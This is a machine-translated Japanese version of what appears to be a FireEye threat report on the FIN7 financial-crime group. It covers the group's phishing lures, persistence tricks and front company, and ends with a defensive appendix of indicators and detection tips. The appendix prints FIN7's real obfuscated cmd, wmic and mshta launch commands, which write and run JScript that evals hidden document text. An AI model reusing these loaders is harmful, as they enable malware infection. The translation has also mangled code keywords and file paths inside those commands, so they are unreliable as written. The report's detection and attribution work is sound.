2018 年 8 月 1 日、 ワシントン州西部地区連邦地方検事局は起訴状を公開し、FIN7 として 2015 年以来追跡してきた活動と一致する犯罪組織の指導者ランク内の 3 人の個人の逮捕を発表しました。これらの悪意のある攻撃者は、この 10 年間で最も多作な金融脅威グループの 1 つであり、100 を超える組織を標的とした慎重に作成された攻撃を行っています。 FIN7 は、多くのベンダーによって「Carbanak グループ」と呼ばれていますが、CARBANAK バックドアのすべての使用を FIN7 と同一視しているわけではありません。このブログでは、FIN7 のさまざまな犯罪ベンチャー、成功を後押しした技術革新とソーシャル エンジニアリングの創意工夫、最近のキャンペーンの概要、犯罪活動の前線としてのセキュリティ会社の明らかな使用、およびその成功が世界にとって何を意味するかを探ります。前進する脅威の状況。このリリースでは、FireEye は、企業全体で FIN7 の動作を追跡するために組織が使用できる技術的なコンテキスト、履歴指標、および手法も提供しています。
FIN7は犯罪を行います…
この脅威グループは、被害者のシステムから支払いカード データを継続的に標的にし、大規模に盗み出すことを特徴としています。このデータの少なくとも一部は、著名なカード ショップを通じて収益化しています。しかし、FIN7 の金融活動は、カード データの盗難に限定されませんでした。場合によっては、エンド ツー エンド暗号化 (E2EE) またはポイント ツー ポイント暗号化 (P2PE) で保護された販売時点管理 (POS) システムから支払いカード データを取得できなかった場合、FIN7 は財務部門を標的にしました。被害者組織内で。
さらに、2017 年 4 月、FireEye は、FIN7 が複数の組織で米国証券取引委員会 (SEC) への提出に関与した担当者にスピア フィッシング メールを送信したことを報告し、FIN7 の標的に関するさらなる洞察を提供しました。これらの標的となった個人は、FIN7 のアクターが株式取引で競争上の優位性を得るために使用できる重要な非公開情報にアクセスできる可能性があります。
収益化戦略の多様化により、このグループは、クレジットカード業界のみに関連する業界を超えて、幅広い業界に影響を与えることができました。 FireEye が FIN7 に関連付けるキャンペーンでは、米国とヨーロッパで次のセクターの被害者が標的にされました。
- レストラン・旅行
- ホスピタリティ *教育
- カジノとゲーム *建設
- エネルギー *小売
- 金融 *通信
- ハイテク *政府
- ソフトウェア *ビジネスサービス
FIN7 のイノベーションが彼らの成功を可能にしました
FireEye が FIN7 キャンペーンを追跡している間、攻撃者は斬新な戦術を使用し、十分なリソースを備えた作戦の特徴を示して、ゲームの先を行き、検出を妨害しようとしました。たとえば、2017 年 4 月、 FireEye は、隠しショートカット ファイル (LNK ファイル) を利用して感染を開始する FIN7 のスピア フィッシング メールと、mshta.exe によって起動された VBScript 機能を使用して被害者に感染することについてブログに掲載しました。これは、武器化された Office マクロの確立された使用からの直接的な逸脱であり、検出を回避するためのグループの適応性を際立たせました。
FireEye は以前、FIN7 がCARBANAK バックドアをエクスプロイト後のツールとして使用して、ネットワーク内で足場を固め、被害者の環境へのアクセスを維持したことについても報告しました。 CARBANAK は、2013 年にさかのぼる非常に収益性の高い高度な攻撃で使用されたことでよく知られており、2015 年後半に始まった FIN7 に起因する使用に起因しますが、この 5 年間にわたってマルウェアを使用したキャンペーンがどのように相互接続されているかは不明です。 FIN7 による CARBANAK の使用は、バックドアを起動するために創造的な持続メカニズムを使用しているため、特に注目に値します。このグループはアプリケーション shim データベースを利用して、悪意のあるインメモリ パッチを Services Control Manager (「services.exe」) プロセスに挿入し、CARBANAK バックドア プロセスを生成しました。 FIN7 は、この戦術を使用して、支払いカード ハーベスティング ユーティリティをインストールしました。
FIN7 のもう 1 つの注目すべき特徴は、デジタル証明書を多用していることです。当然のことながら、悪意のある攻撃者は、これらの証明書によって得られる正当性を悪用しようとしています。 FIN7 は、フィッシング ドキュメント、バックドア、および後期段階のツールにデジタル署名することで、Office ドキュメントからのマクロの実行を制限し、信頼できるシステムでの署名されていないバイナリの実行を制限する可能性のある多くのセキュリティ コントロールを回避することができました。
|
組織 |
国 |
シリアル |
Eメール |
|
コーサー トラベル TOV |
UA |
88:21:ac:7e:6c:da:11:00:1d:b3:d3:1a:16:c1:5c:26 |
kosartravel@bk.ru |
|
カイチュク・ジェームス |
GB |
30:2e:7f:14:3a:f3:f3:98:20:70:42:4e:ea:52:5d:d2 |
oliversoftware@hotmail.com |
|
パークトラベル |
ル |
4d:e2:87:56:98:bf:c7:74:a3:f3:47:d6:70:7c:9b:f0 |
inga@parktravel-mx.ru |
表 1: FIN7 コード署名証明書のサンプル
FIN7 は急速に回避技術を開発しました。 2017 年を通して、FIN7 は新しい難読化方法を作成し、場合によっては、複数の被害者を標的とする攻撃を開始しながら、方法を毎日変更することが観察されました。この脅威グループは、悪意のある DOC、DOCX、および RTF フィッシング ドキュメントをパブリック リポジトリに対して定期的にテストし、静的検出エンジンの範囲を確認しました。 Windows コマンド インタープリター (cmd.exe) のネイティブ文字列置換を使用したペイロード難読化スタイルの開発は非常にユニークで、FireEye はそれを「FINcoding」と名付けました。これらの方法は、コマンド ライン難読化の詳細な研究と、Daniel Bohannon のInvoke-DOSfuscationのリリースに影響を与えました。サンプルの選択とそれに関連するコマンド ラインの難読化手法については、表 2 と表 3 を参照してください。
FIN7のしつこい電話と嫌がらせ
FireEye は 3 年間にわたり、多数の侵害に対応し、積極的に FIN7 を防御してきましたが、前例のないソーシャル エンジニアリングの腕前を観察しました。最初の連絡先として Web フォームを活用することから、事前に決められた店長をターゲットにして直接関与することまで、オペレーターはさまざまな能力を発揮しました。 FIN7 の範囲は、標的のコンピュータ システムを超えて拡大しました。 FireEye は、悪意のあるドキュメントを含むデジタル苦情を提出する前、およびフィッシング ドキュメントが送信された後に、FIN7 が被害者に電話をかけ、それらが受信されたかどうかを確認するために、それらが受信されたかどうかを確認するというインシデントに対応しました。
FIN7 が成熟するにつれて、フィッシングルアーとテンプレートの品質も向上しました。ほとんどの場合、完全に偽装された偽の個人や企業から送信され、正当な政府機関になりすました送信者アドレスから送信されることもありました。彼らのフィッシングは、多くの場合、選択した標的に合わせて調整された、緊急で価値の高いビジネス上の問題を悪用しています。個々の店舗では、管理者が紛失について連絡を受けるか、過剰請求を主張する「領収書」が送信されました。その他の FIN7 フィッシング メールは、詳細なケータリング注文や、食事制限のある個人に合わせた特別メニューのリクエストを装いました。
2017 年初頭、苦情のパターンが出現し、1 年以上続いています。FIN7 は店舗や企業のオフィスに連絡を取り、悪意のある添付ファイルを添付して食中毒の苦情を申し立てています。図 1 に示すように、FireEye によって社内で「 FINdigestion 」と呼ばれるこの詳細な苦情のパターンは、最終的には個々の苦情を超えて、「政府」に代わって提起された訴訟問題へと拡大しました。
2017 年 7 月にProofpoint によって最初に特定された BATELEUR バックドア アクティビティは、FireEye が FIN7 サブグループの疑いとして追跡していることが注目に値します。このアクティビティは、ターゲットに高度にカスタマイズされたグラフィックを使用しており、多くの場合、Adobe Photoshop で作成されています。この同じフィッシング キャンペーンでは、FIN7 の悪意のある添付ファイルは、図 2 に示すように、それに合わせてグラフィカルなテーマになっていました。
FireEye は、FIN7 の運用を通じて、フィッシング要素の専門的な設計と継続的な開発を他の侵害後のツールと並行して行ったことから、FIN7 が十分なリソースを備えた犯罪組織である可能性が最も高いことがわかりました。
それはただのメタデータです
FireEye は、有益なメタデータの法医学的価値のあるファイルタイプを収集および解析することにより、運用全体を通じていくつかの FIN7 ペルソナを追跡してきました。以前のブログで、FIN7 によって作成された LNK ファイルが、意図せずに開発環境に関する貴重な情報を明らかにしたことを共有しました。
LNK ファイルには、元のファイル パス、ボリューム シリアル番号、MAC アドレス、ホスト名など、LNK が作成されたシステムに関する属性を明らかにするメタデータを含めることができます。 LNK メタデータ内の値を調査することで、多くの場合、「ツールマーク」、またはマルウェアの開発者と運用者の明確なペルソナに関連付けられた一意の値を識別します。
FIN7 LNK メタデータは、攻撃者が ANDY-PC や USER-PC などの一般的なホスト名と、構造 WIN-[A-Z0-9]{11} (例: WIN-ABCDEFGH1JK) を持つデフォルトのホスト名を持つ仮想マシンを日常的に使用していたことを示しています。
FireEye は、FIN7 の操作に関連するいくつかのホスト名とパスのツールマークを追跡しており、これらを使用して脅威活動のクラスターをリンクしています。これらのツールマークは、ツール開発またはより広範な犯罪活動に関与している FIN7 メンバーに関連付けられている可能性があります。テクニカル データの注目すべきペルソナは、テクニカル 付録 セクションで詳しく説明されています。
- 「アンディ」/「アンディ pc」
- ハス
- 「ジンボ」
- 「コンスタンチン」(コンスタンチン)
- オレグ
この分析により、FIN7 のシステムを理解し、将来の攻撃活動をさまざまなペルソナに関連付けることができました。さらに、メタデータ分析は、グループによって生成されたファイルを監視し、確立されたツールマークを使用して、グループが TTP を変更した場合に他の敵対的手法 (直接 RDP や SMB アクセスなど) の検出を確立するのに役立ちました。
FIN7操作のビデオ再生
FireEye は、複数の FIN7 の侵入に対応している間に、FIN7 が運用の一環として使用していたカスタム ビデオ録画機能を回復しました。 FireEye の FLARE チームはビデオ プロトコルをリバース エンジニアリングしました。これは、外部ライブラリとの依存関係がなく、コードにキリル文字のコメントが含まれており、FIN7 に固有の特注のビデオ プレーヤーを使用する必要があったため、FIN7 によってカスタム作成されたように見えました。攻撃者はおそらく、このビデオ録画機能を武器に利用して、被害者の環境での操作を監視し、侵入の後の段階に通知しました。
FireEye は、信頼できるソースから犯罪者の開発者のビデオ プレーヤーのバージョンを入手し、リバース エンジニアリングされたプロトコルの知識を利用して、FLARE チームはソース コードを修正し、FIN7 のカスタム エンコーディングの複数のバージョンをサポートしました。パッチが適用されたソース コードを使用して、FireEye は FIN7 のビデオ モニタリングをデコードおよび再生し、これらのファイルを所有している影響を受ける被害者を監視できます。
FIN7 オペレーションの最近の変化
2018 年を通して、FireEye は、以前の FIN7 アクティビティと一致するパターンを使用して登録された複数のドメインを特定し続けてきました。 BIRDDOG バックドアを配信する ZIP アーカイブは、2018 年に登録された FIN7 と疑われるドメインの一部でホストされていました。このキャンペーンの性質をさらに特徴づけるいくつかの証拠は、これらの悪意のあるドキュメントが、早ければ 2017 年 9 月に東ヨーロッパと中央アジアの金融機関の顧客に送信されたことを示唆しています。組織ではなく個人を標的にすることは、標的を大きく変えることになりますが、これらのキャンペーンで偽装された銀行が FIN7 の最終的な標的であった可能性もあります。
さらに、FIN7 の活動と、2017 年半ばに始まり、主に米国を拠点とするレストラン チェーンを狙った BATELEUR キャンペーンとの類似点を特定しました。これらのキャンペーンでは、メールに直接添付されたマクロが埋め込まれた Word 文書や、Google ドライブにホストされている Word 文書が利用されました。ドキュメントは、正当な組織 (レストラン協会や POS ハードウェアのサプライヤーなど) からのものであるかのように見せるために、細心の注意を払って作成されました。この疑わしい FIN7 活動は、米国の法執行機関が発表した最新の逮捕日以降も継続していますが、攻撃者は現在、GRIFFON と呼ばれる更新された JavaScript バックドアを利用しています。
これらの最近のキャンペーンは、検出を回避するために TTP を多様化する決定的な取り組みを表している可能性があります。または、自律的なキャンペーンを実行する FIN7 分派グループの形成を示している可能性があります。その結果、組織は警戒を怠らず、FIN7 アクターが採用する手法の変化を監視し続ける必要があります。
FIN7のフロント企業と業界を公開
米国の法執行機関によると、FIN7 の活動の少なくとも一部は、Combi Security と呼ばれるフロント企業から実行されました。そのウェブサイトのキャッシュは、同社がモスクワ、ハイファ、オデッサに本社を置き、「現代のサイバー脅威から大規模な情報システムを包括的に保護する分野の世界的リーダー」であると主張していたことを明らかにしています。 Combi Security の求人広告は、ロシア、ウクライナ、ウズベクの人気求人サイトに掲載されているほか、同社で働いている可能性が高い多数の個人を特定しました。募集の投稿が正当に見えるため、一部の個人は自分の仕事が違法であることを認識していない可能性があります。無意識の個人を操り人形として募集することは、少なくとも一部の犯罪計画の一般的な構成要素となっています。たとえば、魅力的な在宅勤務の仕事を宣伝するキャリア サイトへの投稿を通じて募集されたラバを再発送するなどです。合法的な攻撃的なセキュリティ エンゲージメントが特に注目に値するためです。 Combi Security がこのように無防備な個人を採用するという明らかな成功は、将来、サイバー犯罪者によるこの種の技術的採用の増加につながる可能性があります。
分裂?
FIN7 の背後にある犯罪組織は、ほぼ確実に、法執行機関によってすでに逮捕されている個人以外にも、さらに多くの個人で構成されています。 FireEye iSIGHT Intelligence は、これらの悪意のあるアクターの少なくとも一部が、何らかの形でサイバー犯罪活動を継続する可能性が高いと予想しています。活動は継続すると予想されますが、脅威アクターが TTP を変更したり、高レベルのメンバーの逮捕や使用している TTP の公開などの重要な展開に続いて、一時的に操作を停止したりすることは非常に一般的です。
グループの組織およびコミュニケーション構造によっては、将来的に複数のサブグループが形成され、独立した活動を実行する可能性もあります。最近のキャンペーンや、広範囲に標的を絞った SEC キャンペーンなど、過去の FIN7 キャンペーンでは一般的でなかった戦術を使用するキャンペーンは、FIN7 犯罪組織内に既存または協力している半自律的なグループを代表している可能性があります。 CARBANAK の概要で説明したように、特定のマルウェア ファミリと手法は、厳密に定義された脅威グループを超えており、開発者や運用者が組織やキャンペーンを移行する際に再利用される可能性があります。
結論
米国の法執行機関によるこれらの最近の発表は、組織化されたサイバー犯罪活動を妨害する際に、民間部門と公的部門の組織間の相乗効果から生じる可能性があるプラスの影響を強調しています。 FIN7 が示すように、金銭目的の脅威アクターは非常に高度になりつつあり、大規模ではあるが慎重に編成されたキャンペーンを通じて、組織に重大な損害を与えることができます。巧妙な脅威グループが出現し続ける中、ここに示されているようなパートナーシップが、これらの脅威と戦う上で重要な役割を果たすことはほぼ確実です。
謝辞
ジョーダン・ヌース、トム・ベネット、マイケル・ベイリー、ダニエル・ボハノン
技術的な付録
FireEye は、多くの FIN7 インシデントに対応しており、その業務について広範な洞察を得ることができました。このブログ投稿の一部として、FIN7 に起因すると考えられる多数の指標と、組織がネットワーク全体で悪意のあるアクティビティを特定するのに役立つ手法の概要も含めています。
フィッシング文書の技術的詳細
FIN7 フィッシング ドキュメントには、LNK メタデータに加えて、スピア フィッシング ドキュメントの作成に使用されたコンポーネント ファイルのローカル ファイル システム パスの詳細を示すアーティファクトが一貫して含まれていました。次の表には、FIN7 で使用される無数のコマンド ライン難読化手法の例も含まれています。特に注目すべきは、異なる手法を採用したドキュメント間の迅速なターンアラウンド タイムです。
|
EXIF 作成時間 |
帰属 |
マルウェア |
MD5 |
ファイル名 |
|
2018:05:21 17:32:00 |
疑わしいFIN7 |
グリフォン |
7e703dddcfc83cd352a910b48eaca95e |
|
|
C:Users jimbo DesktopFilesPicturesoutlook2.png |
||||
|
cmd.exe /k “SET a01=wscr& SET a02=ipt&&call %a01%%a02% /e:jscript //b %TEMP%errors.txt |
||||
|
EXIF 作成時間 |
帰属 |
マルウェア |
MD5 |
ファイル名 |
|
2018:01:26 15:59:00 |
疑わしいFIN7 |
バトラー |
bb1a76702e2e7d0aa23385f24683d214 |
Doc1.doc |
|
C:Users Hass DesktopPicturesNewoutlook3.png |
||||
|
cmd.exe /c wscript.exe //b /e:jscript %TEMP%crashpad.ini |
||||
|
EXIF 作成時間 |
帰属 |
マルウェア |
MD5 |
ファイル名 |
|
2018:01:11 13:16:00 |
疑わしいFIN7 |
バテレアー |
5972597b729a7d2853a3b37444e58e01 |
チェック.doc |
|
C:Users Hass DesktopPicturesNewoutlook2.png |
||||
|
cmd.exe /c wscript.exe //b /e:jscript %TEMP%crashpad.ini |
||||
|
EXIF 作成時間 |
帰属 |
マルウェア |
MD5 |
ファイル名 |
|
2017:10:25 07:43:00 |
疑わしいFIN7 |
バトラー |
c4aabdcf19898d9c30c4c2edea0147f0 |
document1.doc |
|
C:Users oleg DesktopFilesPicturesNewdefender.jpg |
||||
|
cmd.exe /c wscript.exe //b /e:jscript %TEMP%crashpad.ini |
||||
|
EXIF 作成時間 |
帰属 |
マルウェア |
MD5 |
ファイル名 |
|
2017:06:23 15:18:00 |
疑わしいFIN7 |
バトラー |
467062d2a5a341716c42c6d7f36ba0ed |
チェック.doc |
|
C:Users Work DesktopIMAGESoutlook2.png |
||||
|
wscript.exe //b /e:jscript %TEMP%debug.txt |
表 2: 疑わしい FIN7 スピア フィッシングの起動パラメータと攻撃者のローカル システム アーティファクト
|
EXIF 作成時間 |
帰属 |
マルウェア |
MD5 |
ファイル名 |
|
2017:10:06 11:21:00 |
FIN7 |
ハーフベイク |
29a3666cee0762fcd731fa663ebc0011 |
Doc0610.docx |
|
C:Users andy Desktopunlock.cmd |
||||
|
cmd /c “”%TMP%unlock.cmd”” |
||||
|
@set w=wsc@ript /b /e:js@cript %HOMEPATH%tt.txt |
||||
|
EXIF 作成時間 |
帰属 |
マルウェア |
MD5 |
ファイル名 |
|
2017:09:27 11:56:00 |
FIN7 |
ハーフベイク |
6146a18570e134c6c32633aca14375fb |
Doc2709.docx |
|
C:Users usr Documentssend0917unlock.doc.lnk |
||||
|
wmic.exe process call create “cmd start /min cmd /c for /f “usebackq delims=” %x in (`FindStr /R /C:”@#[0-9]#@” ” %TEMP%unlock.doc.lnk”`) do %x|cmd >nul 2>&1 &” |
||||
|
cmd.exe /S /D /c” echo /*@#8#@*/try{sh=新しい ActiveXObject(“Wscript.Shell”);fs=新しい ActiveXObject(“Scripting.FileSystemObject”);p=sh. ExpandEnvironmentStrings(“%TM”+”P%”);f=fs.GetFile(p+”//unlock.doc.lnk”);s=f.OpenAsTextStream(1,0);c=s.Read(2403) ;c=s.ReadAll();s.Close();this[String.fromCharCode(101)+’va’+’l’](c);}catch(e){} >%HOMEPATH%t. txt & wscript //b /e:jscript %HOMEPATH%t.txt >nul 2>&1 &” |
||||
|
EXIF 作成時間 |
帰属 |
マルウェア |
MD5 |
ファイル名 |
|
2017:08:08 17:38:00 |
FIN7 |
ハーフベイク |
03e85ad4217775906e6b5ceae8dc27af |
Doc_n0908.rtf |
|
C:Users andy Desktopunlock.doc.lnk |
||||
|
wmic.exe プロセス呼び出し create “mshta javascript:eval(“try{eval(‘wall=GetObject(”’+String.fromCharCode(44)+”Word.Application’)’ );eval(wall.ActiveDocument.Shapes(2).TextFrame.TextRange.Text);}catch(e){};close();”)” |
||||
|
mshta.exe “try{jelo = ‘try{w=GetObject(“”,”Wor”+”d.Application”);this[String.fromCharCode(101)+’va’+’l ‘](w.ActiveDocument.Shapes(1).TextFrame.TextRange.Text);}catch(e){};’;var fso = new ActiveXObject(“Scripting.FileSystemObject”);var sh = new ActiveXObject( “Wscript.Shell”);var p = sh.ExpandEnvironmentStrings(“%HOMEPATH%”) + “\jelo.txt”” |
||||
|
EXIF 作成時間 |
帰属 |
マルウェア |
MD5 |
ファイル名 |
|
2017:07:27 15:51:00 |
FIN7 |
半焼き |
63e2eb258a85ed4e72f951cdbff2a58e |
Select.docx |
|
C:Users jinvr-3-1 Desktopunlock.doc.lnk |
||||
|
cmd.exe /C set x=wsc@ript /e:js@cript %HOMEPATH%ttt.txt & echo try{w=GetObject(“”,”Wor”+”d.Application”);this[String. fromCharCode(101)+’va’+’l’](w.ActiveDocument.Shapes(2).TextFrame.TextRange.Text);}catch(e){}; >%HOMEPATH%ttt.txt & echo %x:@=%|cmd |
||||
|
EXIF 作成時間 |
帰属 |
マルウェア |
MD5 |
ファイル名 |
|
2017:06:28 16:21:00 |
FIN7 |
ハーフベイク |
22ad7c05128ca7b48b0a2a4507803b16 |
Doc0507.rtf |
|
C:Users andy Desktopunprotect.rtf.lnk |
||||
|
cmd.exe /C set x=wsc@ript /e:js@cript %HOMEPATH%md5.txt & echo try{w=GetObject(“”,”Wor”+”d.Application”);this[String. fromCharCode(101)+’va’+’l’](w.ActiveDocument.Shapes(1).TextFrame.TextRange.Text);}catch(e){}; >%HOMEPATH%md5.txt & echo %x:@=%|cmd |
||||
|
EXIF 作成時間 |
帰属 |
マルウェア |
MD5 |
ファイル名 |
|
2017:05:11 12:59:00 |
FIN7 |
ハーフベイク |
99975b5ee2ddd31e89c9bdda7a3871d9 |
Doc1.docx |
|
C:UsersユーザーDocumentsunprotect.lnk |
||||
|
C:WINDOWSsystem32mshta.exe vbscript:Execute(“On Error Resume Next:set yjdsqjtrn=GetObject(,””Word.Application””):execute yjdsqjtrn.ActiveDocument.Shapes(2).TextFrame.TextRange.Text :近い”) |
||||
|
EXIF 作成時間 |
帰属 |
マルウェア |
MD5 |
ファイル名 |
|
2017:04:20 16:27:00 |
FIN7 |
ハーフベイク |
42a2a2352f6b1f5818f3b695f240fc3a |
情報.rtf |
|
C:Users testadmin.TEST Desktopunprotect.lnk |
||||
|
C:WINDOWSsystem32mshta.exe vbscript:Execute(“On Error Resume Next:set wprotect=GetObject(,””Word.Application””):execute wprotect.ActiveDocument.Shapes(1).TextFrame.TextRange.Text :近い”) |
||||
|
EXIF 作成時間 |
帰属 |
マルウェア |
MD5 |
ファイル名 |
|
2017:01:12 18:00:00 |
FIN7 |
ハーフベイク |
cea2989309ccd5128f437335622978f1 |
注文.rtf |
|
C:Users testadmin.TEST Desktopunprotected.vbe |
||||
|
%WINDIR%System32Wscript.exe %TEMP%WindowsUpdate_X24532beginer.vbs |
||||
|
EXIF 作成時間 |
帰属 |
マルウェア |
MD5 |
ファイル名 |
|
2016:08:12 11:26:00 |
FIN7 |
ハーフベイク |
fbf653b89a0814f515ddbdcf82cc3795 |
予約 – Copy.docx |
|
C:Users test Documentssploits0816order.vbe |
||||
|
%WINDIR%System32Wscript.exe %TEMP%AdobeUpdateManagementTool.vbs |
表 3: FIN7 スピア フィッシングの起動パラメータと攻撃者のローカル システム アーティファクト
FIN7 戦術、技術、手順 (TTP)
FireEye は、攻撃ライフサイクルの複数の段階にわたる FIN7 の注目すべき手法についての洞察と、この活動の証拠を特定するためのヒントと、環境内の同様の疑わしい活動を特定するためのヒントを提供します。
|
攻撃のライフサイクル ステージ |
攻撃者の方法論 |
発見のヒント |
|
最初の妥協 |
PHP Mailer を使用して送信されたスピア フィッシング メール |
「X-Mailer: PHPMailer」などのメタデータを含む受信メール |
|
足場を固める |
レジストリの Run および Run Once キーを使用した永続化 |
.VBS および .VBA を参照する新しい Run および RunOnce レジストリ エントリ |
|
足場を固める |
スケジュールされたタスクを使用した実行または永続化 |
.CMD、.LNK、.VBS、.VBA、.PS1、およびその他のスクリプト言語拡張を参照する新しいスケジュールされたタスク |
|
足場を固める |
Windows サービス、スタートアップ ディレクトリを使用した永続化 |
新しい Windows サービス、スタートアップ ディレクトリの新しいファイル |
|
足場を固める |
AppCompat Shim を使用した永続化 |
新しい shim データベース ファイルと AppCompatFlags レジストリ キーの変更 ( FIN7 SDB Persistenceを参照) |
|
プレゼンスを維持する |
優先 C2 ポートを使用する C2 |
53、80、443、8080 などの一般的なポートでポート プロトコルが一致しないアウトバウンド接続 |
|
プレゼンスを維持する |
好まれる一般的な 3LD を使用する C2 |
メール、www1、www2、dns、ftp などの一般的な第3レベル ドメインを含む「大ざっぱな」第2レベル ドメインへのアウトバウンド接続または DNS 解決 (例: 「mail[.]qefg[.]info」) |
|
プレゼンスを維持する |
レピュテーションの低いVPSインフラを利用したC2 |
非標準 IP 範囲との間のインバウンドおよびアウトバウンド接続、特に国際的な Virtual Private Server (VPS) プロバイダーからの接続 |
|
プレゼンスを維持する |
Google Docs、Google Script、Pastebin などの正当なサービスを使用する C2 |
|
|
プレゼンスを維持する |
A、OPT、TXT レコードを介して DNS を使用する C2 |
異常に長いまたは多数の DNS A、TXT、および OPT レコード クエリ |
|
プレゼンスを維持する |
REG.RUに登録されたC2ドメイン |
REG.RU 経由で登録された、新たに観測されたドメイン |
|
プレゼンスを維持する |
NameCheapに登録されたC2ドメイン |
NameCheap 経由で登録された、新しく観察されたドメイン |
|
プレゼンスを維持する |
奇妙な形式で登録された C2 ドメインとトップレベル ドメイン |
[a-zA-Z]{4,5}.[pw|us|club|info|site|top] という構造の非常に長い、または多数の DNS クエリ (例: 「pvze[.]club」) |
|
プレゼンスを維持する |
ハイフンで登録されたC2ドメイン |
新しく登録された、ハイフンでつながれたドメインへのアウトバウンド接続 |
表 4: FIN7 TTP
FIN7 インジケーター
FireEye は、これらの詳細な技術指標を提供することで、関係者が脅威アクターをよりよく理解し、企業ネットワーク全体での過去の活動を検索できるようにします。
フィッシング ドキュメント ドロッパー
|
ファイル名 |
MD5 |
帰属 |
マルウェア |
|
menu.rtf |
c14eb54769ff208a2562e4ef47958d9e |
FIN7 |
|
|
|
76eb6f124fba6599a54e92b829c55b63 |
FIN7 |
ビーコン |
|
3-トンプソンダン.rtf |
4b783bd0bd7fcf880ca75359d9fc4da6 |
FIN7 |
ビーコン |
|
claim.rtf |
af53db730732aa7db5fdd45ebba34b94 |
FIN7 |
ビーコン |
|
注文.rtf |
cea2989309ccd5128f437335622978f1 |
FIN7 |
ビーコン |
|
注文.rtf |
cf4ccb3707e5597969738b4754782e4d |
FIN7 |
ビーコン |
|
Doc2_rtf.rtf |
2dc0f4bece10759307026d90f585e006 |
FIN7 |
ビーコン |
|
doc1.doc |
37759603c6cd91ebc8a1ea9ac0f2d580 |
FIN7 |
ビーコン |
|
引用.rtf |
3c0bd71e91e0f18621ba43de4419f901 |
FIN7 |
ビーコン |
|
Doc2_rtf.rtf |
562a64f1c09306d385962cf8084b6827 |
FIN7 |
ビーコン |
|
情報.doc |
5dace5ac5ba89c9bba4479264f75b2b6 |
FIN7 |
ビーコン |
|
Doc_rest_rtf.rtf |
619aa4e6c9db275381ab0e7fc7078f5f |
FIN7 |
ビーコン |
|
doc1.docx |
67c9bfd4d6ac397fb0cd7da2441a6fe2 |
FIN7 |
ビーコン |
|
Doc33.docx |
6a5a42ed234910121dbb7d1994ab5a5e |
FIN7 |
ビーコン |
|
info_.rtf |
6ac5ae6546746e3a9502cc489b71146e |
FIN7 |
ビーコン |
|
bmg.docx |
754fc509328af413d93131e65fc46d31 |
FIN7 |
ビーコン |
|
Doc_0405_1.rtf |
7b2315ff1f2d763857aa70ad34b75449 |
FIN7 |
ビーコン |
|
doc1.docx |
99975b5ee2ddd31e89c9bdda7a3871d9 |
FIN7 |
ビーコン |
|
doc0505_1.rtf |
9eb71edd5ec99294a1c341efa780b1b1 |
FIN7 |
ビーコン |
|
DonovanR.docx |
b5829caad7c448c558cb1dab2d9f4320 |
FIN7 |
ビーコン |
|
ライジングスター.rtf |
c8b8420d1503ae48ff35362f5d29eeb3 |
FIN7 |
ビーコン |
|
inf6.docx |
e494356fc0db7ef6009d29e5ae869717 |
FIN7 |
ビーコン |
|
請求.docx |
06b9e2fdd2c0eeb78b851c93ca66f25f |
FIN7 |
ベルホップ |
|
注文.rtf |
80eed9f87a18b0093eb3f16fa495b6f7 |
FIN7 |
ベルホップ |
|
詳細 Joseph.docx |
b4d48f3e1ae339f2fcb94b7abceecfff |
FIN7 |
ベルホップ |
|
注文.doc |
e2a6b351c276d02d71e18cd0677e8236 |
FIN7 |
ベルホップ |
|
b14bc8cbc7f2d36179ebff96ade6d867 |
FIN7 |
カルバナク |
|
|
機能.doc |
bbd99ef280efebe9066c0aef91bf02cd |
FIN7 |
ドリフトピン |
|
doc2709.rtf |
01d666fcbc4cdcedbfe7963f498e7858 |
FIN7 |
ハーフベイク |
|
doc_n0908.rtf |
03e85ad4217775906e6b5ceae8dc27af |
FIN7 |
ハーフベイク |
|
doc1.docx |
0d6619481cfd29791a51ebb42ace5c03 |
FIN7 |
ハーフベイク |
|
doc1.rtf |
0e0a51489054529a9dcb177d39f08b81 |
FIN7 |
ハーフベイク |
|
doc0719.docx |
101bdbbd99cfd74aa5724842404642f2 |
FIN7 |
ハーフベイク |
|
doc0507.docx |
17fabe288d640476a70154c59d5a1ba1 |
FIN7 |
ハーフベイク |
|
info_1.rtf |
189c5a090d2b3b87ab65a8b156cd971e |
FIN7 |
ハーフベイク |
|
doc.docx |
1a6c18967f4ce1c91c77098af4957e6e |
FIN7 |
ハーフベイク |
|
メール.rtf |
1a9e113b2f3caa7a141a94c8bc187ea7 |
FIN7 |
ハーフベイク |
|
Doc_rest_n_rtf.rtf |
1f5022a02c82fbe414dc91bf3f1b5180 |
FIN7 |
ハーフベイク |
|
doc.docx |
1f98c4ff12fc2c6fbf8247a5b2e4e7f4 |
FIN7 |
ハーフベイク |
|
doc1909.docx |
1fbe77a3b5771ce4f95e02a49c5b7f30 |
FIN7 |
ハーフベイク |
|
doc_n0808.rtf |
21926646a658bdf39cf28cdfbb1aced7 |
FIN7 |
ハーフベイク |
|
doc0507.rtf |
22ad7c05128ca7b48b0a2a4507803b16 |
FIN7 |
ハーフベイク |
|
Doc2.docx |
22e7d4f7401ef34b3b6d17c15291c497 |
FIN7 |
ハーフベイク |
|
menu.rtf |
24fab1e9831e57307d17981abaabf960 |
FIN7 |
ハーフベイク |
|
2-order.docx |
28ad8e3a225400a1d00f6023f8e6c9c8 |
FIN7 |
ハーフベイク |
|
doc0610.docx |
29a3666cee0762fcd731fa663ebc0011 |
FIN7 |
ハーフベイク |
|
doc2209_1.rtf |
2d36634974c85eff393698b39edc561c |
FIN7 |
ハーフベイク |
|
Doc1.rtf |
307a9ce257e97189e046fa91d3c27dab |
FIN7 |
ハーフベイク |
|
doc1.rtf |
325844f1b956c52fc220932bc717f224 |
FIN7 |
ハーフベイク |
|
doc0910.rtf |
3917028799d2aa3a43ec5bad067e99a5 |
FIN7 |
ハーフベイク |
|
doc1.docx |
397d45b6001919b04739e26379c84dd9 |
FIN7 |
ハーフベイク |
|
docr.rtf |
3a303f02e16d7d27fa78c3f48a55d992 |
FIN7 |
ハーフベイク |
|
oliver_davis.docx |
3b12f36a01326ec649e4def08b860339 |
FIN7 |
ハーフベイク |
|
doc2209.docx.docx |
402c34d7d6ce92bf5a048023bd2fde4a |
FIN7 |
ハーフベイク |
|
Dooq.docx |
41c6861313e731bd3f84dd70360573ce |
FIN7 |
ハーフベイク |
|
情報.rtf |
42a2a2352f6b1f5818f3b695f240fc3a |
FIN7 |
ハーフベイク |
|
ジェームズ.docx |
499ebef3ab31a2f98fc8a358bd085b0f |
FIN7 |
ハーフベイク |
|
doc1007.rtf |
4b7a742d5c98fc62f0f67445032e7bc6 |
FIN7 |
ハーフベイク |
|
tem6.doc |
4bf691809224d17e49cebb071d22a867 |
FIN7 |
ハーフベイク |
|
